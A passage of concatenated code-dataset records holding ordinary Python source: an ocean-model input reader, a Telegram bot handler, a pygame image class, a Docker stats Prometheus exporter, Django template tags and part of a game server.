intermediate_eddy_w_velocity_1_data = np.fromfile(intermediate_eddy_w_velocity_1_data_path)\n w_eddy_velocity_1 = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_eddy_velocity_1[x,i] = intermediate_eddy_w_velocity_1_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # INTERMITTANT EDDY W VELOCITY 2\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(intermediate_eddy_w_velocity_2_data_path):\n intermediate_eddy_w_velocity_2_data = np.fromfile(intermediate_eddy_w_velocity_2_data_path)\n w_eddy_velocity_2 = np.zeros((vertical_layers,array_length))\n for i in range(0,array_length):\n for x in range(0, vertical_layers):\n w_eddy_velocity_2[x,i] = intermediate_eddy_w_velocity_2_data[vertical_layers * i + x]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_initial_conditions_data_path):\n salinity_backward = np.fromfile(salinity_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_initial_conditions_data_path):\n temperature_backward = np.fromfile(temperature_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # HEAT FLUX\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(heat_flux_loss_data_path):\n heat_flux_loss_data = np.fromfile(heat_flux_loss_data_path)\n shortwave_radiation = np.zeros(array_length)\n surface_heat_flux = np.zeros(array_length)\n kinetic_energy_loss = np.zeros(array_length)\n for i in range(0,array_length):\n shortwave_radiation[i] = heat_flux_loss_data[3*i + 0]\n surface_heat_flux[i] = heat_flux_loss_data[3*i + 1]\n kinetic_energy_loss[i] = heat_flux_loss_data[3*i + 2]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SURFACE NUTRIENTS\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(surface_nutrients_data_path):\n surface_nutrients_data = np.fromfile(surface_nutrients_data_path)\n NO3_s1 = np.zeros(array_length)\n NH4_s1 = np.zeros(array_length)\n PO4_s1 = np.zeros(array_length)\n SIO4_s1 = np.zeros(array_length)\n for i in range(0,array_length):\n NO3_s1[i] = surface_nutrients_data[4*i + 0]\n NH4_s1[i] = surface_nutrients_data[4*i + 1]\n PO4_s1[i] = surface_nutrients_data[4*i + 2]\n SIO4_s1[i] = surface_nutrients_data[4*i + 3]\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # BOTTOM NUTRIENTS\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(bottom_nutrients_data_path):\n bottom_nutrients_data = np.fromfile(bottom_nutrients_data_path)\n O2_b1 = np.zeros(array_length)\n NO3_b1 = np.zeros(array_length)\n PO4_b1 = np.zeros(array_length)\n PON_b1 = np.zeros(array_length)\n for i in range(0,array_length):\n O2_b1[i] = bottom_nutrients_data[4*i + 0]\n NO3_b1[i] = bottom_nutrients_data[4*i + 1]\n PO4_b1[i] = bottom_nutrients_data[4*i + 2]\n PON_b1[i] = bottom_nutrients_data[4*i + 3]\n\n return wind_speed_zonal, wind_speed_meridional, surface_salinity, solar_radiation, inorganic_suspended_matter, \\\n salinity_climatology, temperature_climatology, w_velocity_climatology, w_eddy_velocity_1, \\\n w_eddy_velocity_2, salinity_backward, temperature_backward, \\\n shortwave_radiation, surface_heat_flux, kinetic_energy_loss, \\\n NO3_s1, NH4_s1, PO4_s1, SIO4_s1, O2_b1, NO3_b1, PO4_b1, PON_b1\n\n\n# wind_speed_zonal, wind_speed_meridional, surface_salinity, solar_radiation, inorganic_suspended_matter, \\\n# salinity_climatology, temperature_climatology, w_velocity_climatology, w_eddy_velocity_1, \\\n# w_eddy_velocity_2, salinity_initial_profile, temperature_initial_profile, \\\n# surface_solar_radiation, surface_heat_flux_loss, kinetic_energy_loss, \\\n# NO3_s1, NH4_s1, PO4_s1, SIO4_s1, O2_b1, NO3_b1, PO4_b1, PON_b1 = read_pom_input()\n\n\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# SUBROUTINE: get_TS_IC\n#\n# DESCRIPTION: This subroutine opens and reads files containing the T&S initial conditions\n# Files are read in direct access mode reading path specified in pom_input nml\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n\ndef get_temperature_and_salinity_initial_coditions():\n\n \"\"\"\n Description: Opens and reads files containing the initial conditions for temperature\n and salinity. Files are read from the pom_input namelist.\n\n :return: temperature and salinity at the current and backward time level\n \"\"\"\n\n salinity_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_S_150m_bermuda_killworth2.da'\n temperature_initial_conditions_data_path = current_path + '/inputs/POM_BFM17/init_prof_T_150m_bermuda_killworth2.da'\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # SALINITY INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(salinity_initial_conditions_data_path):\n salinity_backward = np.fromfile(salinity_initial_conditions_data_path)\n\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n # TEMPERATURE INITIAL PROFILE\n # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n if path.exists(temperature_initial_conditions_data_path):\n temperature_backward = np.fromfile(temperature_initial_conditions_data_path)\n\n temperature = np.zeros(vertical_layers)\n salinity = np.zeros(vertical_layers)\n\n temperature[:] = temperature_backward[:]\n salinity[:] = salinity_backward[:]\n\n return temperature, temperature_backward, \\\n salinity, salinity_backward\n\n\n# temperature_current_time_level, temperature_backwards_time_level, \\\n# salinity_current_time_level, salinity_backwards_time_level = get_temperature_and_salinity_initial_coditions()\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# ROUTINE: GetDelta\n#\n# DESCRIPTION: Get the numeric timestep\n# Transfer the integration time step to the BFM Unit conversion\n# from seconds to days\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\ndef get_numeric_timestep():\n\n \"\"\"\n Description: Get the numeric timestep. Transfer the integration timestep to the BFM\n Unit conversion from seconds to days.\n\n :return: numeric timestep\n \"\"\"\n\n numeric_timestep = params_POMBFM.dti / seconds_per_day\n\n return numeric_timestep\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# ROUTINE: Service\n#\n# DESCRIPTION: This routine passes the physical variables to the BFM\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# def pom_to_bfm():\n\n# \"\"\"\n# Description: Passes the physical variables to the BFM\n\n# :return: seawater density, temperature and salinity, suspended sediment load,\n# photosynthetically available radiation, gridpoint depth, and wind speed\n# \"\"\"\n\n# # try:\n# # import NOPOINTERS\n# # NOPOINTERS = True\n# # except FileNotFoundError:\n# # NOPOINTERS = False\n# # if NOPOINTERS:\n# # from modules import ETW, ESW, EIR, ESS, ERHO, EWIND, Depth\n\n# from modules_old import vertical_layers, water_specific_heat_times_density, temperature_backward, \\\n# salinity_backward, density_profile, bottom_depth, vertical_spacing, shortwave_radiation, wind_stress_zonal, \\\n# wind_stress_meridional, diffusion_coefficient_momentum, diffusion_coefficient_tracers, \\\n# velocity_zonal, velocity_meridional, kinetic_energy, \\\n# kinetic_energy_times_length, length_scale\n\n# from modules_old import inorganic_suspended_matter, interpolated_w_velocity, w_eddy_velocity\n\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # 1D ARRAYS FOR BFM\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# ETW = np.zeros(vertical_layers - 1)\n# ESW = np.zeros(vertical_layers - 1)\n# ESS = np.zeros(vertical_layers - 1)\n# ERHO = np.zeros(vertical_layers - 1)\n# Depth = np.zeros(vertical_layers - 1)\n# EIR = np.zeros(vertical_layers - 1)\n\n# for i in range(0,vertical_layers - 1):\n# ETW[i] = temperature_backward[i]\n# ESW[i] = salinity_backward[i]\n# ERHO[i] = (density_profile[i] * 1.E3) + 1.E3\n# ESS[i] = inorganic_suspended_matter[i]\n# Depth[i] = vertical_spacing[i] * params_POMBFM.h\n\n# EIR[0] = -1. * shortwave_radiation * water_specific_heat_times_density\n\n# wind_stress = np.sqrt(wind_stress_zonal**2 + wind_stress_meridional**2) * 1.E3\n# EWIND = np.sqrt(wind_stress/(1.25 * 0.0014))\n\n# return ETW, ESW, EIR, \\\n# ESS, ERHO, EWIND\n\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# # ROUTINE: get_IC\n#\n# DESCRIPTION\n#\n# This subroutine opens and read files containing the initial conditions\n# for p2c, z4c, r1c, r6c, n1p, n3n, n4n, and o2o\n# Files are read in direct access mode reading path\n# specified in bfm_IC_input nml\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\ndef get_initial_conditions():\n\n \"\"\"\n Desription: Opens and reads data files containing the initial conditions for p2c, z4c,\n r1c, r6c, n1p, n3n, n4n, and o2o\n\n :return: initial conditions for phytoplankton carbon, zooplankton carbon, particulate\n organic carbon, dissolved organic carbon, phosphate, nitrate, ammonium,\n and oxygen\n \"\"\"\n\n phytoplankton_carbon_data_path = current_path + phyto_input\n zooplankton_carbon_data_path = current_path + zoop_input\n particulate_organic_carbon_data_path = current_path + poc_input\n dissolved_organic_carbon_data_path = current_path + doc_input\n phosphate_data_path = current_path + phos_input\n nitrate_data_path = current_path + nit_input\n ammonium_data_path = current_path + am_input\n oxygen_data_path = current_path + oxy_input\n\n if path.exists(phytoplankton_carbon_data_path):\n p2c = np.fromfile(phytoplankton_carbon_data_path)\n\n if path.exists(zooplankton_carbon_data_path):\n z5c = np.fromfile(zooplankton_carbon_data_path)\n\n if path.exists(particulate_organic_carbon_data_path):\n r6c = np.fromfile(particulate_organic_carbon_data_path)\n\n if path.exists(dissolved_organic_carbon_data_path):\n r1c = np.fromfile(dissolved_organic_carbon_data_path)\n\n if path.exists(phosphate_data_path):\n n1p = np.fromfile(phosphate_data_path)\n\n if path.exists(nitrate_data_path):\n n3n = np.fromfile(nitrate_data_path)\n\n if path.exists(ammonium_data_path):\n n4n = np.fromfile(ammonium_data_path)\n\n if path.exists(oxygen_data_path):\n o2o = np.fromfile(oxygen_data_path)\n\n return p2c, z5c, r6c, r1c, n1p, n3n, n4n, o2o\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# MODEL POM - Princeton Ocean Model\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n#\n# # ROUTINE: set_initial_conditions\n#\n# DESCRIPTION\n#\n# This routine assigns initial conditioons of biochemical variables in POM\n#\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# def set_initial_conditions():\n#\n# \"\"\"\n# Description: Assigns initial conditions of biochemical variables in POM\n#\n# :return:\n# \"\"\"\n#\n# from modules_old import vertical_layers\n# from modules_old import zero, NML_OPEN, NML_READ, NMLUNIT, error_msg_prn\n# # from modules import photosynthetic_radiation\n#\n# p_nRc = 0.0126\n# p_pRc = 0.7862E-03\n# p_sRc = 0.0118\n# p_iRc = 1./25.\n#\n# try:\n# import INCLUDE_BEN\n# INCLUDE_BEN = True\n# except FileNotFoundError:\n# INCLUDE_BEN = False\n# if INCLUDE_BEN:\n# from inputs.namelist_input_data import y1c0, y2c0, y3c0, y4c0, y5c0, h1c0, h2c0, \\\n# k1p0, k11p0, k21p0, k4n0, k14n0, k24n0, k3n0, k5s0, k6r0, d1m0, d2m0, d6m0, d7m0, d8m0, d9m0, \\\n# q6c0, q6n0, q6p0, q6s0, q1c0, q11c0, g2o0, g3c0, g13c0, g23c0, g3h0, g13h0, g23h0\n#\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # DEFINITION OF BIOGEOCHEMICAL GLOBAL VARIABLES\n# # IrrOPT in the equation of Steele and light\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# photosynthetic_radiation = np.zeros(vertical_layers,dtype=float)\n#\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # DEFINITION OF GENERAL PELAGIC STATE VARIABLES:\n# # PELAGIC GASES\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# p2c, z5c, r6c, r1c, n1p, n3n, n4n, o2o = get_initial_conditions()\n#\n# # NEED TO FINISH TRANSLATING MODULEMEM\n#\n#\n#\n#\n# # EOC\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # MODEL POM - Princeton Ocean Model\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n","repo_name":"MalikJordan/pyPOM1D-BFM56","sub_path":"pom/initialize_variables.py","file_name":"initialize_variables.py","file_ext":"py","file_size_in_byte":24278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2411018264","text":"import logging\n\nfrom telegram import ParseMode\nfrom telegram.ext import CommandHandler\n\nfrom module.modez import mode\n\n\nclass Startup(object):\n def __init__(self):\n self.logger = logging.getLogger(__name__)\n self.mode = mode.Modez()\n\n def start_command(self, bot, update, user_data):\n \"\"\"\n Show the setting page board\n :param bot:\n :param update:\n :param user_data: store the user config info\n :return:\n \"\"\"\n self.mode.show_mode_board(bot, update, user_data)\n\n def help_info(self, bot, update):\n self.logger.debug(\"send help info\")\n # text = \"`我是机器人小玉,我来说明使用方法!\\n\" \\\n # \"::发送关键词搜索并下载音乐\" \\\n # \"::同上。发送歌单链接,以便导入歌单\" \\\n # \"::发送一张动漫截图,获取动漫信息\" \\\n # \"::如果~变成⦿后,就可以回复我呢(否则需要耐心等待哦)。\\n`\"\n text = \"`我是机器人小玉,我来说明使用方法!\\n\" \\\n \"::发送关键词搜索并下载音乐\\n\" \\\n \"::同上。发送歌单链接,以便导入歌单\\n\" \\\n \"::发送一张动漫截图,获取动漫信息\\n`\"\n # \"::如果~变成⦿后,就可以回复我呢(否则需要耐心等待哦)。\\n`\"\n bot.send_message(chat_id=update.message.chat.id, text=text, parse_mode=ParseMode.MARKDOWN)\n\n def handler_startup(self, dispatcher):\n dispatcher.add_handler(CommandHandler(['start', 'mode'], self.start_command, pass_user_data=True))\n dispatcher.add_handler(CommandHandler('help', self.help_info))\n","repo_name":"GoGoogle/TamakosBot","sub_path":"handler/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2362665582","text":"from pygame import Rect\nfrom pygame.color import Color\nimport pygame.image\nimport pygame.transform\nimport pygame.draw\n\nfrom os import path\n\nfrom timez import Time\n\nclass Image:\n\n def __init__ (self, filename, x, y, w, h):\n\n self.filepath = path.join ('images', filename)\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n\n self.rect = Rect (x, y, w, h)\n self.dbColor = Color ('#00ff00')\n\n self.original = pygame.image.load (self.filepath).convert_alpha()\n self.surface = pygame.transform.scale (self.original, (self.w, self.h))\n\n def draw (self, win_surface):\n win_surface.blit (self.surface, (self.x, self.y))\n\n def debugDraw (self, win_surface):\n pygame.draw.rect (win_surface, self.dbColor, self.rect)\n self.draw (win_surface)\n\n\n def move (self, dx, dy):\n self.x += dx * Time.dt\n self.y += dy * Time.dt\n self.rect.update (self.x, self.y, self.w, self.h)\n\n def moveTo (self, x, y):\n self.x = x\n self.y = y\n self.rect.update (x, y, self.w, self.h)\n\n def resize (self, w, h):\n self.w = w\n self.h = h\n self.rect.w = w\n self.rect.h = h\n self.surface = pygame.transform.scale (self.original, (w, h))\n\n","repo_name":"CSnackerman/CheezeGame","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37627408812","text":"import json\nimport logging\nimport os\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom pathlib import Path\nfrom typing import Callable\nfrom wsgiref.simple_server import make_server\n\nimport docker\nfrom prometheus_client import make_wsgi_app\nfrom prometheus_client.core import REGISTRY, GaugeMetricFamily\nfrom requests.adapters import HTTPAdapter\n\nlogging.basicConfig()\n\nMAX_POOL_SIZE = 100\n\nhost = os.environ.get(\"HTTP_HOST\", \"\")\nport = int(os.environ.get(\"HTTP_PORT\", 8080))\ndebug = os.environ.get(\"DEBUG\", \"false\").lower() in [\"true\", \"on\", \"y\", \"yes\", \"1\"]\n\n\nlogger = logging.getLogger(Path(__file__).stem)\nif debug:\n logger.setLevel(logging.DEBUG)\n\n\ndocker_client = docker.from_env(max_pool_size=MAX_POOL_SIZE)\n\n# Patch the default HTTPAdapter for docker to use a pool size of MAX_POOL_SIZE\n# Setting max_pool_size in docker.from_env doen't take effect for HTTP connections\nif (\n \"http://\" in docker_client.api.adapters\n and docker_client.api.adapters[\"http://\"]._pool_maxsize < MAX_POOL_SIZE\n):\n docker_client.api.mount(\"http://\", HTTPAdapter(pool_maxsize=MAX_POOL_SIZE))\n\n\nclass CustomCollector(object):\n def collect(self):\n with ThreadPoolExecutor() as t:\n stats = list(\n t.map(\n lambda c: c.stats(stream=False),\n docker_client.containers.list(),\n )\n )\n\n logger.debug(f\"Stats: {json.dumps(stats)}\")\n\n def gauge_metric(\n name: str,\n documentation: str,\n supplier: Callable[[dict], float],\n ):\n g = GaugeMetricFamily(name, documentation, labels=[\"name\"])\n for stat in stats:\n g.add_metric([stat[\"name\"].lstrip(\"/\")], supplier(stat))\n return g\n\n yield gauge_metric(\n \"container_cpu_usage_total\",\n \"Total CPU time consumed\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"total_usage\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_kernel\",\n \"Time spent by tasks of the cgroup in kernel mode\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"usage_in_kernelmode\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_user\",\n \"Time spent by tasks of the cgroup in user mode\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"usage_in_usermode\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_system\",\n \"System Usage\",\n lambda s: s[\"cpu_stats\"][\"system_cpu_usage\"],\n )\n yield gauge_metric(\n \"container_mem_usage\",\n \"Total memory usage for container\",\n lambda s: s[\"memory_stats\"][\"usage\"],\n )\n yield gauge_metric(\n \"container_mem_limit\",\n \"Memory usage limit for container\",\n lambda s: s[\"memory_stats\"][\"limit\"],\n )\n yield gauge_metric(\n \"container_io_read_total\",\n \"Total IO read by the container\",\n lambda s: sum(\n [\n io[\"value\"]\n for io in s[\"blkio_stats\"][\"io_service_bytes_recursive\"] or []\n if io[\"op\"] == \"read\"\n ]\n ),\n )\n yield gauge_metric(\n \"container_io_write_total\",\n \"Total IO written by the container\",\n lambda s: sum(\n [\n io[\"value\"]\n for io in s[\"blkio_stats\"][\"io_service_bytes_recursive\"] or []\n if io[\"op\"] == \"write\"\n ]\n ),\n )\n\n network_metrics = {\n key\n for stat in stats\n for network in stat.get(\"networks\", {}).values()\n for key in network.keys()\n }\n for network_metric in network_metrics:\n g = GaugeMetricFamily(\n f\"container_net_{network_metric}\",\n f\"Network metric {network_metric}\",\n labels=[\"name\", \"network\"],\n )\n for stat in stats:\n for network_name, network in stat.get(\"networks\", {}).items():\n g.add_metric(\n [stat[\"name\"].lstrip(\"/\"), network_name],\n network[network_metric],\n )\n yield g\n\n\nREGISTRY.register(CustomCollector())\n\napp = make_wsgi_app()\nhttpd = make_server(host, port, app)\n\nprint(f\"Started server: http://localhost:{port}\")\nhttpd.serve_forever()\n","repo_name":"dgootman/docker-exporter","sub_path":"docker_exporter.py","file_name":"docker_exporter.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35071134166","text":"from django import template\nfrom blogging.models import Category, Feedback, Post\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('blogging/list_categories.html')\ndef show_categories(sort=None, cat_selected=0):\n if not sort:\n cats = Category.objects.all()\n else:\n cats = Category.objects.order_by(sort)\n\n return {'cats': cats, 'cat_selected': cat_selected}\n\n\n@register.simple_tag()\ndef get_feedback():\n return Post.objects.get(id=2).feedbacks.all()\n","repo_name":"Gaidysheff/BILLBOARD","sub_path":"BillBoard/blogging/templatetags/blogging_tags.py","file_name":"blogging_tags.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14926202982","text":"from worldgen import WorldGen\nfrom entities.player import Player\nfrom entities.zombie import Zombie\nfrom math import ceil\nfrom random import randint, random, choice\nfrom timer import Cooldown, Stopwatch\n\n\nclass Server:\n def __init__(self, state):\n self.state = state\n self.entities = []\n self.tilemap = {}\n self.ticker_tiles = {}\n self.worldgen = WorldGen(self.tilemap, self)\n self.worldgen.start()\n self.monster_time_scale = 1\n self.mob_cap = 10\n self.monster_cooldown = Cooldown(60 * 5 * self.monster_time_scale)\n self.age = Stopwatch()\n\n def get_world_spawn(self):\n x = randint(-10, 10)\n y = self.get_highest(x)\n return (x, y)\n\n def spawn(self, entity_type, x):\n same_type = len([\n entity\n for entity in self.entities\n if isinstance(entity, entity_type)\n ])\n if same_type < self.mob_cap:\n y = self.get_highest(x)\n entity = entity_type(self, (x, y))\n self.entities.append(entity)\n return entity, True\n\n def get_tile(self, pos):\n if pos not in self.tilemap:\n self.worldgen.generate(pos)\n return self.tilemap[pos]\n\n def get_highest(self, x, stop_clip=True):\n y = -15\n while True:\n if (x, y) in self.tilemap:\n y -= 1\n else:\n break\n tile = self.get_tile((x, y))\n while tile and tile.COLLISION:\n y += 1\n tile = self.get_tile((x, y))\n return y + 